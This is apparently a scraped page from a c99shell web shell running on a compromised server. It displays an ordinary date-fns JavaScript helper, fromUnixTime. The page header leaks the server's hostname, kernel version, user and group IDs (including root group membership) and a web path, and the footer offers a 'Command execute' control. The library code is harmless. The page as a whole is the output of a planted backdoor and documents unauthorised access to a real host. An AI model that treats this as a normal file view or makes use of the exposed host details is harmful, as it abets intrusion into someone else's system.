Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/rentals.picotech.app/public_html/node_modules/date-fns/esm/fromUnixTime/ drwxr-xr-x |
Viewing file: Select action/file-type: import toDate from "../toDate/index.js"; import toInteger from "../_lib/toInteger/index.js"; import requiredArgs from "../_lib/requiredArgs/index.js"; /** * @name fromUnixTime * @category Timestamp Helpers * @summary Create a date from a Unix timestamp. * * @description * Create a date from a Unix timestamp (in seconds). Decimal values will be discarded. * * @param {Number} unixTime - the given Unix timestamp (in seconds) * @returns {Date} the date * @throws {TypeError} 1 argument required * * @example * // Create the date 29 February 2012 11:45:05: * const result = fromUnixTime(1330515905) * //=> Wed Feb 29 2012 11:45:05 */ export default function fromUnixTime(dirtyUnixTime) { requiredArgs(1, arguments); var unixTime = toInteger(dirtyUnixTime); return toDate(unixTime * 1000); } |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]-- |